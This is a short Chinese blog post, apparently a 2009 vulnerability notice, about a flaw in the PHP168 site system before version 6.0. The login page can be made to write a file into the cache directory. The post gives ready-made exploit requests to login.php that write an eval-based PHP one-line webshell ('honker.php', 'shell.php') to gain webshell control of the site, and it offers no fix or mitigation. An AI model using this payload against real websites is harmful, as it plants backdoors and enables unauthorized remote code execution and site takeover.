Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2997711
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-09-10 00:37:10

危险等级:高

影响版本:PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。

测试语句:
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?

 

--------------------------

login.php

login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=

写到:cache/shell.php ,

阅读(639) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~